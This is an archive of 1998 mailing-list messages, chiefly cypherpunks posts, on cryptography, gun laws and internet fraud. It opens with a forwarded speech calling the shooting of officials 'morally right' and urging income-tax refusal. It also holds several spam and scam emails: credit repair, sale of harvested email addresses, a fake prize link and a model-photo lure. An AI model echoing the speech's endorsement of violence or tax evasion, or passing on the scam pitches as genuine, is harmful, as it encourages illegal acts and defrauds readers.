 GPTH: 200/200 0 100/0 500/0 14
 GATE: 1:273/304.0@fidonet 35188aac

* Origin: FidoNet <-> PRNet EchoGate! (1:273/304.0)
*********************************************************
To post a message to AEN NEWS, address it to news@aen.org.


--Digest-12348D34

Return-Path: <aen!aen.org!bill.smith@uunet.uu.net>
Delivered-To: jcaldwel@iquest.net
Received: (qmail 25758 invoked from network); 26 Mar 1998 19:21:09 -0000
Received: from relay4.uu.net (192.48.96.14)
  by iquest3.iquest.net with SMTP; 26 Mar 1998 19:21:09 -0000
Received: from uucp1.uu.net by relay4.UU.NET with SMTP 
 (peer crosschecked as: uucp1.uu.net [192.48.96.81])
 id QQeikj20441; Thu, 26 Mar 1998 14:21:06 -0500 (EST)
Received: from aen.UUCP by uucp1.uu.net with UUCP/RMAIL
        ; Thu, 26 Mar 1998 14:21:07 -0500
Received:  by aen.org (MailGate 0.24 mg@ear.anpe.br)
           Thu, 26 Mar 1998 14:16:00
Date:      Mon, 23 Mar 1998 11:55:02
From: BILL SMITH <bill.smith@aen.org>
Sender: AEN-NEWS <NEWS@AEN.ORG>
Message-ID: <872acd96ec56a07b@aen.org>
Organization: American Justice Federation
To: Multiple recipients of list NEWS <NEWS@AEN.ORG>
Subject:   slaves                1/3
X-Mailer: MailGate 0.24 Unregistered
X-UIDL: a81aec78baf7018c7b8665879425cfaa

* Original: FROM: BILL SMITH
* Original: TO:   ALL
* Original: AREA: MILITIA

* Forwarded by Al Thompson
* Forwarded Using QuickBBS 2.76 Ovr
* Forwarded at 13:17 on 26-Mar-98 

 EID:C950 FC775EE0
SPEECH BEFORE THE ARIZONA LIBERTARIAN PARTY CONVENTION April 19, 1997

by Claire Wolfe

In November, 1995, I sat down and wrote the words, "America is at that
awkward stage; it's too late to work within the system, but too early to
shoot the bastards." That's a line a lot of you have become familiar with, and
to the extent that other people have also become familiar with it, it has a lot
to do with Arizona libertarians pushing that message.

Well, I wrote that a year and a half ago, the book was published about six
months ago, and now here we are, April 19, 1997. Is it time to "shoot the
bastards" yet? This is a question a lot of us have been pondering.

We signed our oath, most of us, we signed our pledge not to initiate
violence. We're the good guys. We know that. But I have heard so many
people -- good, responsible, ordinary people -- talking about whether we
might be reaching the time that we should "shoot the bastards".

I think one of the best comments on this came from Vin Suprynowicz, who
interviewed me when the book was published. Actually, of all the things
said in the interview Vin made the best comment; he said that we have
reached the time when it is _morally_ right to "shoot the bastards", but
it is not yet _practical_ to do so.

I do believe that a fight is inevitable, whether that's a fight in the
streets or the trenches, or whether that is some sort of confrontation
that may not involve arms but may nevertheless involve violence and
head-to-head action. I think that's inevitable, and I think more and more
people are coming to the conclusion that it is.

April 19th, as you all know, is a day in history when many people _have_
taken up arms, when they have been _forced_ to take up arms. Peaceable
people in Lexington and Concord, desperate people in the Warsaw ghetto.
Even when they had no hope, or little hope, they took up arms. But here we
stand, and although a lot of us have arms with us, or not far from us, we're
not ready to "take up arms" yet.

But I hope we're preparing ourselves. I hope we're at least thinking about it.

In the last year and a half, since I originally wrote those frustrated,
angry words, things have gotten a hell of a lot worse. And it's almost
scary how little the disaster that we're in the middle of has been
acknowledged.

For instance, just four -- I don't want to call them laws or acts of
legislation -- four abominations that Congress has come up with in the
time since I originally wrote those words. We've got a federal database of all
employed people, or, that is, all people who get conventional jobs. That's been
done in the name of "tracking deadbeat dads". However, you might be a single
mother with five kids you're taking good care of; you might be a single guy who
never intends to get married. You're going in that database. Why? What does
that have to do with "deadbeat dads"? I don't know. I can't figure it out.

Along those same lines, we now have pilot projects being started, under
which you cannot get a job unless your employer first gets permission from the
Social Security Administration by scanning your card through a reader connected
to a database in Washington, DC. Isn't that cute? Some Social Security
bureaucrat decides whether or not you can ever get a job in this country.

We've also got a medical health care database that will be on line in
about a year. This was part of the "moderate" Kennedy-Kassebaum health
care act -- you'll be pleased to know that this is "moderate". Everything
about your medical history will go into this database, including
speculation on the part of your doctor, who may observe that you're an
"armed and dangerous wacko". He's not going to tell you that, but it goes
in your records and goes in the database. (NOTE: Please see comment at 
the
end of this transcript.)

The fourth one that is really for me the "line in the sand" issue is the
national ID card that we have just begun to hear about in the last couple
of months. Has everybody heard something about that? Well, for the few who
haven't I'll just review quickly.

At the end of the 104th Congress there were about two paragraphs added
into several hundred pages of legislation that requires that by October,
2000, all states will be issuing driver's licenses that you must have your
Social Security card to get one, and they will have certain "security
features". These are not defined in the law, but they may include: retinal
scans; fingerprint scans; other data on your driving history, health history,
criminal history, so on. (NOTE: The U.S. Secretary of Transportation is
currently in the process of writing the regulation on this.)

And by October 2006, you will not be able to get _any_ government service
at _any_ level without having one of these driver's licenses. You will not be
able to get a passport. If your local utility company is the government you
will not be able to get water to your house, or electricity to your house, and
so on. My Christian friends, of course, are calling this the "Mark of the
Beast", and I don't think they're wrong. I think they're right.

So those four things, among many, many others, have all been snuck in on
us lately. But the reason I pick these four is something that a friend
pointed out to me. This friend says, "These four are slave laws." Many
other laws that have been imposed upon us recently are bad laws, but
_these_are_slave_laws_. They all enable the federal government to track
its property -- you, and you, and you, and me -- its property.

They can monitor our health just the way that farmers monitor the health
of their cattle. If they don't think we're being properly productive they
can deny us the jobs, or they can make sure that we're in a job that they
like.

It's here, now, that we have to stop this. I hope we can stop it without
violence, but we do HAVE to stop it.

What I'd like to focus on today are some things that I think we as
individuals can do, and some of the things that I think that libertarian
party organizations can, or perhaps should, do to prepare for the hard
times that are going to come when the day arises that we say, "No! It
stops here! It stops now!"

I wish for just this little moment that we were all a bunch of Marxists,
or Democrats, or something, because then I could say, "Comrades! You
_must_ do this! Comrades! You _shall_ do that!" But we're libertarians,
and it's only, "Hey! You'll do what you want to do; I'll do what I want to do.
You'll do what fits your personality; I'll do what fits my personality." And
that is the way it has to be. That's our strength and our weakness.

But there are a couple of things that I would say that I think everybody
here, and everybody who professes to be a libertarian _should_do_. One is
to get the income tax out of your own life, however you have to do it. Get it
out!

In every other presentation I've ever given before I've said, "Oh I
understand that if you have a regular job, or if you have children, or if
you have a lot of nice possessions it's riskier for you to do it. But I'm
coming to the point where, I'm sorry, we can't feed the beast. We've got
to stop feeding it. That's all there is to it. All of our great
professions of principle in the world are nothing if we don't stop paying
the ATF, paying the FBI, paying the IRS.

The other thing that I hope everyone will do is resist this national ID in some
way or another. Refuse to get the driver's license, drive without it, whatever
you have to do. Refuse to give the information, protest, scream, rescind your
social security number, whatever.
>>> Continued to next message
---
 * OLX 2.2 * It's dangerrous to be right when the government is wrong
--- GEcho 1.00
 # Origin: Texas Patriot PRN-Dallas (972)495-6699 (176:200/200)
 GPTH: 200/200 0 100/0 500/0 14
 GATE: 1:273/304.0@fidonet 35188aac

* Origin: FidoNet <-> PRNet EchoGate! (1:273/304.0)
*********************************************************
To post a message to AEN NEWS, address it to news@aen.org.


--Digest-12348D34--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Sun, 29 Mar 1998 13:47:20 -0800 (PST)
To: jcaldwel@iquest.net
Subject: Re: Fw: Re: Calif. AB2560=A Whiff Of Dictatorship....
In-Reply-To: <199803291822.KAA04950@toad.com>
Message-ID: <351EEBBB.8B0C8906@acm.org>
MIME-Version: 1.0
Content-Type: text/plain


jcaldwel@iquest.net wrote:
> 
> > > In addition to the AB 23 bill, which will retroactively felonize a very
> > > broad class of weapons, here's a new one which will make felons out of
> > > anyone who goes shooting with others, anyone who teaches a self-defense
> > > class, and (depending on interpretation by the courts) anyone who gives
> > > advice here on the Cypherpunks list about weapons, self-defense, and
> > > explosives and suchlike devices.
> 
> Let me know when it passes, you note I said *when* and I'll offer advise
> direct to californicates attorney general via this list. Seeing as states are
> attempting to persecute non-state-citizens with it's laws it should be
> interesting.

It was when they started doing it years ago (on porn sites) but now it
is an established practice.

> 
> and .45acp beats 9mm
 But I prefer 12 ga
PHM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: creditforu@hotmail.com
Date: Sun, 29 Mar 1998 17:40:14 -0800 (PST)
To: creditforu@hotmail.com
Subject: IMPORTANT: About your Credit ReportNo matter what "The Credit Bureaus" tell you, YOU CAN REMOVE NEGATIVE INFORMATIONfrom your credit reports, no matter if the negative information is true or not. No previous skills necessary!
Message-ID: <199803300137.RAA25422@germany.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


IT IS SO EASY TO CLEAR NEGATIVE CREDIT NOW...
Don't let anyone have access to your personal credit report.
We will show you how to do it legally and quickly.

(To go to our web site, click on the link now or 
cut and paste it into your browser, but please 
DO NOT retype it in.)

http://207.204.174.21/directcredit/  

10 minutes a month is all you need . . .

* Direct Credit removes negative items from each 
  major credit report:  Experian (Formally TRW),    
  TransUnion, CBI/Equifax

* Direct Credit will communicate with the credit 
  bureaus, so you will never need to

* Direct Credit reviews your credit reports on a 
  regular basis!

* Direct Credit Manages your own credit reports 
  quickly and easily

* Direct Credit re-establishes your good credit, Fast!"

This is not hype!  Direct Credit truly works. 

If you have "Bad Credit" or know someone who does, 
you can not let this opportunity go by.  

(To go to our web site, click on the link now or 
cut and paste it into your browser, but please 
DO NOT retype it in.)

http://207.204.174.21/directcredit/

We can help you today!

Regards,

Team Direct Credit










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sun, 29 Mar 1998 18:38:15 -0800 (PST)
To: kalliste@aci.net>
Subject: spread spectrum  radio communications
Message-ID: <351F0486.12AC@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sunday 3/29/98 6:59 PM

John Gilmore
John Young
J Orlin Grabbe

Waiting for Patty to check out at the Albertson's today
I looked at Scientific American, April 1998.

Scientific American has GREAT ARTICLE on spread
spectrum radio communications.

Hopefully messages about NSA crypto algorithms we
tried to bring out in my SAND report are

  1 shift register based
  2 parallel in nature

The stuff Grabbe wrote at 

  http://www.aci.net/kalliste/cryptnum.htm

and

  http://www.aci.net/kalliste/stefbrdc.htm

is great.

But THIS IS NOT WHAT NSA USES FOR THE REAL
STUFF.

In fact, when NSA/Sandia tried to use the chips described
in 

  [5] Whitfield Diffie, "The First Ten Years of Public Key          
Cryptography," Proceedings of the IEEE, 76(5), May 1988.

they met with a financial disaster.  $300k to recalled EACH nuke
to remove the chips, I was told by Jerry Allen.

  http://www.aci.net/kalliste/nukearse.htm

Real world engineering considerations requires simplicity.
Reliability in the field.

NSA's Brian Snow told us the problems of fielded algorithms
implementations.

Now that 

  NSA's Trojan Whore?

is published at 

  http://caq.com/CAQ/caq63/caq63madsen.html

perhaps few will trust putting their confidential information 
into chips or machines manfactured by others.

Cylink is BIG into spread spectrum communications.

And, John Gilmore, I think you are right about there being some
real business opportunities in this area.

Madsen's article may cause others to leave this business.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: P4XCPc9xC@iftisnews1.net
Date: Sun, 29 Mar 1998 20:32:34 -0800 (PST)
To: world@know.it
Subject: Make It Happen!
Message-ID: <Wzj1Kl1gR07Xw9>
MIME-Version: 1.0
Content-Type: text/plain


      LET US DO YOUR BULK E-MAILINGS!!!

..$450 PER MILLION (5 MILLION OR MORE $400 PER MILLION)
..$350 PER 1/2 MILLION

THE WAY OF THE FUTURE FOR SUCCESS IN YOUR BUSINESS!

Our company will do bulk emailing for your product/service.

Addresses are extracted daily by 8 of our computers,
which run 24 hours a day 7 days a week, scanning the net
for new addresses.  Estimated 100-150,000 addresses extracted 
daily.  They are fresh!  Over 40 million addresses on file.

No more than 2 pages (50 lines), no porn, no sexual relative 
material and no foul language.  $50 per page/25 lines per 
additional page.  We do not do targeted mailings at this 
price.  

Addresses are deliverable, non-deliverable are removed
with each mailing.  All removes have been deleted from
each mailing before mailing your ad.

Targeted mailings: 
$200 per 50,000 addresses or less extracted.
$125 per 25,000 addresses or less extracted.
$75 per 10,000 addresses or less extracted.
We can extract by country, occupation, organizations, 
associations, product, website, state, etc.  If we can not 
search and extract what you need, then nobody can.
No one can target your mailing for less.

***SPECIAL*** Targeted US ADDRESSES ONLY $750 per 1/2 
million.  A savings of $1,250.  We have over 6 million 
addresses, non AOL, and collecting more each day.

For those of you who would like to do you own mailings,
we offer software for all bulk emailing success.  Call
for more details about the same software we use for our
clients.  Turn your computer into your personal mail
server.

There are no lower prices on the net.  Your mailing 
can be done in a matter of hours, instead of days.  

For the fastest service, cheapest prices and cleanest
mailings call our processing and new accounts department
at 904-282-0945, Monday - Friday 9 - 5 EST.  If the line is
busy, please keep trying, as bulk mailing is growing fast.  
We do want to work with you to advertise your product.
Check out our prices and compare with other emailers, you
will find we have the BESt prices anywhere.

To have yourname@domain removed, call our processing office.
Any negative responses will be dealt with accordingly.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sbear@datanet.com.mx
Date: Sun, 29 Mar 1998 17:36:05 -0800 (PST)
Subject: BUY DIRECT FROM HONG KONG
Message-ID: <eaep.3.0.reg.HeiTCR.35883.856615162@mail.activecom.net>
MIME-Version: 1.0
Content-Type: text/plain



HONG KONG TRADE DIRECTORY
BUY DIRECT FROM HONG KONG AND MAKE HUGE PROFITS ON THE 
NET,MAILORDER,RETAIL STORES ETC!!!!!
http://www.vicom.net/books
HONG KONG PROFITS... You have heard that there are factories in Hong Kong that produce
thousands of products at low give-away prices. But never before have you been able to believe
that you could get in on these lucrative profits! 
 
SECRET SOURCES ... Only the big importers knew the secret addresses in Hong Kong and
who to buy from. We went to Hong Kong, located the low cost sources and have put them in our
Hong Kong Trade Directory. 
 
FREE SAMPLES... Yes, you can get samples direct from Hong Kong with this complete Hong
Kong Trade Directory. Shipments can be made to you by air practically overnight. Your dollars
are valuable in Hong Kong. No need to pay high union labor costs in the U.S. or bloated
manufacturers' profits. 
 
BEST PRICES... Why buy from Hong Kong? It's simple! You want to get the best prices. You
want to get exclusive import deals! Imagine, if you will. that you can get the exclusive import
rights for the U.S. on a product! If everyone in the U.S. had to buy from you, wouldn't you be
able to make a fortune? 
 
DON'T DELAY... But, don't delay! Now that we are making our directory available, others
will want to get on the bandwagon. There's still time, but you must act quickly to be one of the
first to get in on the new low cost buying opportunities. 
 
EASY TO IMPORT... Let me assure you that your only cost for getting in contact with nearly
300 manufacturers in Hong Kong that offer over 10,000 products is only $15, and the few cents
to send them a letter once you have our Hong Kong Trade Directory. There are no membership
fees to pay. No fancy, expensive import courses to take. We've eliminated all of that. 
 
FACTORY PRICES... Watches; Bonds; Fashion Accessories; Radios; Garments; Hardware;
Handbags; Jewelry; Toys; Hats; Calculators; Decorations; Art; Gloves; Footwear; Foodstuffs;
Hair Products; Vacuums; Gift Items; Plastic Products; Photo Equipment; Car Accessories;
Lamps; Novelties; Chemicals; Machinery; and much, much more 
 
LATEST EDITION... You will get the latest, most current edition and just getting it in your
hands will put your fortune within your grasp. 
 
MAIL ORDER PRODUCTS... Find a new MAIL ORDER item in our Hong Kong Trade
Directory . . . or find a staple item at a new low price or find a source to have a product made to
order for you at cheap Oriental prices, and the top quality that Americans demand! 
 
It's all here in the ALL NEW Hong Kong Trade Directory. Full, 64 pages . . . complete with
photos on every page... 
 
WHOLESALE ONLY... Remember this is a wholesale importing directory, not retail; you are
dealing directly with the factory in all cases. The Chinese work on low markups seeking their
profit from many orders. 
 
GUARANTEE! We guarantee that the addresses listed are 95% accurate. We also guarantee
that items shown in the Directory are from direct sources who will ship to the U.S.A. 
 GO TO  http://www.vicom.net/books  For more info





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 30 Mar 1998 05:16:29 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Someone IS falling for these scams!
Message-ID: <199803301313.HAA13146@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Web Investment Con Artists Prove
              Elusive, Insufferable to Regulators

              By RIVKA TADJER 
              Special to THE WALL STREET JOURNAL INTERACTIVE EDITION

              When it comes to con artists who target individual investors,
              none are proving to be more elusive -- or more infuriating
              -- to federal regulators than Internet scammers.

              The explosion of Internet investment fraud has prompted
              the Federal Trade Commission, in cooperation with the
              Securities and Exchange Commission, the Department of
              Justice, and Federal Bureau of Investigation, to coordinate
              elaborate surveillance tactics to combat these on-line con
              artists, says Paul Luehr, attorney and chairman of the FTC
              Internet Coordinating committee, which oversees law
              enforcement.

              Although many investors are becoming more savvy about
              dubious investment claims posted on the Web, fraud still
              abounds. Investors who use the Internet for research and
              discussion need a healthy dose of skepticism when visiting
              any investment Web site.

              Barry White, a 40-year-old CPA in Charlotte, N.C., and,
              ironically, now a fraud examiner, says he learned this lesson
              the hard way. Last year, he became the victim of what the
              FTC called "an elaborate, electronic version of a chain
              letter" called Fortuna Alliance. But he thought his
              nightmare was finally over when the FTC in the spring of
              1997 nabbed the operators of Fortuna Alliance and shut
              down its Web site.

              Customers of Fortuna Alliance, the Bellingham, Wash.,
              company charged with conducting the operation, were told
              that if they "invested" between $250 and $1,750 a month,
              they could get back $5,250 monthly. Fortuna Alliance took
              in at least $5 million from people like Mr. White, according
              to the FTC.

              Mr. White had been optimistic that with the FTC on the
              case, he might actually get back some of the $5,000 he sunk
              into Fortuna Alliance's pyramid scheme. But now he's
              losing hope. And he has discovered that the operators of the
              on-line scam are back in business.

              The principals of Fortuna are now living offshore in Antigua
              and have set up a new Web site (www.fa2.com), says Susan
              Grant, director of the National Consumers League Internet
              Fraud Watch in Washington, whose mission is to use
              collective consumer opinion to influence business practices.
              The Fortuna site's operators are so brazen that they haven't
              even bothered to change the name, she says. Fortuna
              officials would not return phone calls.

                             "One thing is true about Web
                             scammers -- they are so arrogant.
                             Fortuna just put up a new Web site
                             recently and went back in business,"
                             she says, lamenting that "there will
                             always be plenty of people who don't
                             check with us or the FTC to see
                             whether there are law suits against an
                             investment site."

                             "I think it's pretty poor that the FTC
                             can't get them," says Mr. White, who
                             says he testified before a Senate
                             committee hearing on the matter of
                             Internet fraud last month "more for
                             community service at this point than
                             to actually get my money back. I don't
                             want other people to get screwed."

                             Indeed, law enforcement in
              cyberspace may be one of the toughest challenges
              government agencies face. "We're out there and making
              headway, but a global community where scams can pop up
              today and disappear tomorrow is a big job," says Mr. Luehr.

              The Fortuna Alliance Web site is a classic example. It's
              cheap to set up a new Web site under a slightly different
              name, and since there is no legal recourse for Internet
              service providers to judge what sort of sites they are hosting,
              the Fortuna principals could theoretically continue to
              operate indefinitely.

              One of the most frustrating problems for regulators is that
              individual investors often overlook important warning
              signals that are universal in scam Web sites. Mr. White, the
              investor, says he wasn't uncomfortable at all with sending
              his money order for $5,000 to Fortuna Alliance, even
              though he'd never once spoken to a Fortuna official about
              the details.

              "There were very detailed on-line documents that promised
              a 90-day money-back guarantee," he said. "They said they
              were launching a huge ad campaign ... and my return on
              investment would be quick."

              Two months later, Mr. White quite unexpectedly discovered
              he'd been scammed. "I just happened to put in the keyword
              'fraud' on one of the [Internet] search engines ... and news
              that the FTC had just shut them down popped up."

              Looking back, Mr. White says, he should have been tipped
              off that it was an Internet scam by one red flag: After many
              attempts he was never able to get a Fortuna representative
              on the phone after he made his initial investment.

              The good news for consumers, however, is that conducting
              due diligence on investment sites is extremely easy using the
              Internet. The National Consumers League, and the FTC,
              SEC, and FBI Web sites all have fraud watch updates that
              allow consumers to e-mail questions and file complaints
              on-line. This kind of interaction is crucial, experts say, to
              detecting Web fraud. "We follow leads and need as many tips
              ads we can get," says Mr. Luehr.

              The bad news, however, is that on-line cons can go
              undetected for years and new mutations of old cons that take
              advantage of the Internet technology are popping up all the
              time.

              "One way we see the investment scams mutating is the
              combination of loan fraud and pyramid schemes," says the
              National Consumers League's Ms. Grant. "The con artists
              make use of spam to get investors."

              She cites a recent Las Vegas pyramid scheme that promised
              a $59,000 loan for those who mail in $20. It works like this:
              An e-mail arrives offering a chance to apply for a loan that
              you'll never have to pay back. All you have to do is mail in a
              $20 "processing fee."

              Mr. Luehr of the FTC says investors who have already fallen
              for one on-line scam should be especially cautious. "These
              scammers sell lists of names -- like any marketers -- and
              the ones that have already been suckered are considered
              prime targets," Mr. Luehr says.

              Mr. White will vouch for that. "I get phone calls all the time
              now for new 'get-rich' investment opportunities," he says.
              He says other red flags for investment fraud are sites that
              demand money upfront, and those touting "money-making
              opportunities" that promise a quick return with minimal
              risk. Ms. Grant agrees these are the two top signs of an
              investment scam.

              But it is not always so simple. Con artists understand all too
              well the appeal of high-tech investments to investors
              world-wide as scammers capitalize on investors' desire to be
              in on the ground floor of the next Netscape. So many are
              turning to cloaking pyramid schemes in high-tech language,
              Mr. Luehr says.

              "FutureNet was a perfect example," he says. "They used
              buzzwords like WebTV to lure investors and give the
              products a legitimate-sounding air." Similar sounding
              technology names add to the confusion. For example, the
              name "WebTV" is so familiar to the average consumer that
              many fraud schemes involve giving products or companies
              names such as NetTV.

              "This is such a problem we have set up 'Operation Net Opp',
              which is a surveillance task force to watch out for precisely
              this sort of high-tech fraud," says Mr. Luehr.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 29 Mar 1998 22:04:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Design of LOKI97
Message-ID: <199803300604.IAA18869@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




http://www.adfa.oz.au/~lpb/papers/ssp97/loki97b.html

        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew T Darling <darl0006@tc.umn.edu>
Date: Mon, 30 Mar 1998 06:24:14 -0800 (PST)
To: Guess@mail.sochi.ru
Subject: Re: Lamers- mudt die
In-Reply-To: <14572199701136@mail.sochi.ru>
Message-ID: <Pine.SOL.3.96.980330082341.14501D-100000@garnet.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Kill this message... this guy's really pissing me off!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Mon, 30 Mar 1998 06:29:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Lamers- mudt die
In-Reply-To: <14572418001139@mail.sochi.ru>
Message-ID: <199803301429.JAA12743@users.invweb.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3990.1071713783.multipart/signed"

--Boundary..3990.1071713783.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

In <14572418001139@mail.sochi.ru>, on 03/30/98 
   at 05:57 PM, Guess@mail.sochi.ru said:

>Hey you  ;-((


<sigh> Parents really need to keep their children away from the keyboard.

-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
---------------------------------------------------------------
 
Tag-O-Matic: PATH=C:\DOS;C:\DOS\RUN;C:\WIN\CRASH\DOS;C:\ME\DEL\WIN


--Boundary..3990.1071713783.multipart/signed
Content-Type: application/octet-stream; name="pgp00006.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00006.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zYS1z
aGExCkNvbW1lbnQ6IFJlZ2lzdGVyZWRfVXNlcl9FLVNlY3VyZV92MS4xYjFf
RVMwMDAwMDAKCmlRQ1ZBd1VBTlIrczFZOUNvMW4rYUxoaEFRRS9id1FBc3Fi
UDAyaFZKcVQzWWZYWlA4SW9DeGt0Nzd3Wm5tNEMKWkdLSU5CZWNQa0R0dGdK
MzhZbHo1ckhValN5ZzNndlp3Y21WWUgrdnpraFhQQmVpaHo2KzZTY1ZpY0Zm
VjVvNwp0UFdtQmdYU1p5UXNuZE9CRHl2L2k2eStTMTNVQ1YwN0xoaUoxamFR
bVBUdFJRbC9OSEdDNytaNFplaHZNYlNzCkpWWWZzbzYwK1lNPQo9ZSswbwot
LS0tLUVORCBQR1AgTUVTU0FHRS0tLS0t
--Boundary..3990.1071713783.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PDNJMD <PDNJMD@aol.com>
Date: Mon, 30 Mar 1998 05:37:21 -0800 (PST)
Subject: hi im Sandra
Message-ID: <b03d344f.351f9ec8@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: PDNJMD@aol.com
Subject: hi im Sandra
From: PDNJMD <PDNJMD@aol.com>
Date: Mon, 30 Mar 1998 08:27:00 EST
Organization: AOL (http://www.aol.com)

hi my name is Sandra i am an 18 year old model from Italy..Me and my friends
made a webpage with our pictures on it...tell me if im pretty..

<a href="http:/www.angelfire.com/nj/iconz/index.html">Click here to see
our pictures</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Mon, 30 Mar 1998 08:09:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Lamers- mudt die
Message-ID: <5641f5e2.351fc37a@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-30 09:38:22 EST, whgiii@invweb.net writes:

<< In <14572418001139@mail.sochi.ru>, on 03/30/98 
    at 05:57 PM, Guess@mail.sochi.ru said:
 
 >Hey you  ;-((
 
 
 <sigh> Parents really need to keep their children away from the keyboard. >>

<sigh> William, I think that WAS the parent!  Children really need to keep
their parents away from the keyboard.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-news@netscape.com
Date: Mon, 30 Mar 1998 11:57:58 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Netcenter News - Volume 5 - March 1998
Message-ID: <199803301957.LAA14701@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  
 

Title: Netscape Netcenter News






































Welcome to Netcenter
Netcenter is dedicated to the proposition that you should be able to find everything you need online in one place. This newsletter is one of the free benefits you receive when registering with a Netcenter program.
























Finally, an online directory just for the web community. The new Member Directory from Netcenter is where professionals find each other on the web. Register today!
 








Get the world's top business news and information tailored specifically to your business interests. Sign up for Business Journal and receive a free 30-day trial of this Premium Service.























CNET reverses its Editors' Choice decision and now recommends Netscape Communicator 4.04 over Microsoft Internet Explorer 4.0.














 



 

 
Netscape and Intraware team up to offer premium SubscribNet service free to corporate customers. Get automated, hassle-free updates for client products today.











 





This issue of Netcenter News is brought to you by the Netscape Store.


























NETCENTER
ANNOUNCES
PROFESSIONAL
CONNECTIONS




Netcenter is proud to announce Professional Connections, Netscape's new online community where professionals and industry insiders can come together to discuss trends in online business, debate hot-button issues in digital culture, and mix and network with one another.

Professional Connections is not a chat room but a set of interactive forums moderated by industry experts. Forums feature discussions about Internet trends, headlines, and software, including

Who's making money on the web today?
Where do you shop online?
Online investing
Software tips and tricks

Professional Connections can work for you in many ways: as a consulting resource, as a place to air opinions, and as a virtual think tank. Coupled with the new Member Directory, an online source for locating other professionals in the Netcenter community, Professional Connections is an outstanding networking opportunity.

What's more, Professional Connections' Events Series features incisive interviews with industry luminaries and gives community members the opportunity to connect with the guests and the interviewers.

Your Netcenter membership has just become a ticket to network directly with the best minds in the interactive world. Sign up now and join us in Professional Connections.




Working on taxes? The Netscape Guide by Yahoo Finance Page has the federal and state forms you need as well as stocks, news, and events.




Use SmartUpdate to upgrade quickly and easily to the latest version of Communicator with strong encryption or 128-bit security. 




Your next book is only a click away. Amazon.com has joined Netcenter Marketplace! Browse by subject, search through 2.5 million titles, and save up to 40 percent on best-sellers.





Netscape respects your online time and Internet privacy. If you would prefer not to receive future issues, click here to to send an unsubscribe email or reply to this message with the word unsubscribe in the subject line.




Copyright (c) 1998. Netscape Communications Corporation. All rights reserved.
























From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JeffRow12 <JeffRow12@aol.com>
Date: Mon, 30 Mar 1998 09:48:15 -0800 (PST)
Subject: You've won $5,000!
Message-ID: <881cd395.351fd4a8@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: JeffRow12@aol.com
Subject: You've won $5,000!
From: JeffRow12 <JeffRow12@aol.com>
Date: Mon, 30 Mar 1998 12:18:28 EST
Organization: AOL (http://www.aol.com)

<a href="http://www.best.com/~darin1/index.html">Click Here To Get Your
Money!</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah Blatz <jer+@andrew.cmu.edu>
Date: Mon, 30 Mar 1998 09:43:58 -0800 (PST)
To: coderpunks@toad.com
Subject: Re: Deniable Cryptography [was winnowing, chaffing etc]
In-Reply-To: <Pine.LNX.3.96.980328173343.23115B-100000@localhost>
Message-ID: <0p7xTq200YUg0CkXw0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


mgraffam@mhv.net writes:
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On 28 Mar 1998, Julian Assange wrote:
> > Rubber-hose-squad: We will never be able to show that Alice has
> >                  revealed the last of her keys. Further, even if
> >                  Alice has co-operated fully and has revealed all of
> >                  her keys, she will not be able to prove it.
> >                  Therefor, we must assume that at every stage that
> >                  Alice has kept secret information from us, and
> >                  continue to beat her, even though she may have
> >                  revealed the last of her keys. But the whole time
> >                  we will feel uneasy about this because Alice may
> >                  have co-operated fully.
> 
> I've never really fully understood this assumption. It seems to me
> that any person or group that would beat a person isn't going to
> care much if Alice cooperated or not. 
> 
> All things considered, a group with enough power to grab Alice and
> beat her probably has ways to escape punishment from the law, or
> doesn't care about the law in the first place. 
> 
> In this case, I figure that their best option is to beat Alice everyday
> forever or until she dies. Whichever comes first.

"Rubber hose" cryptanalysis needn't involve actual beatings in secret
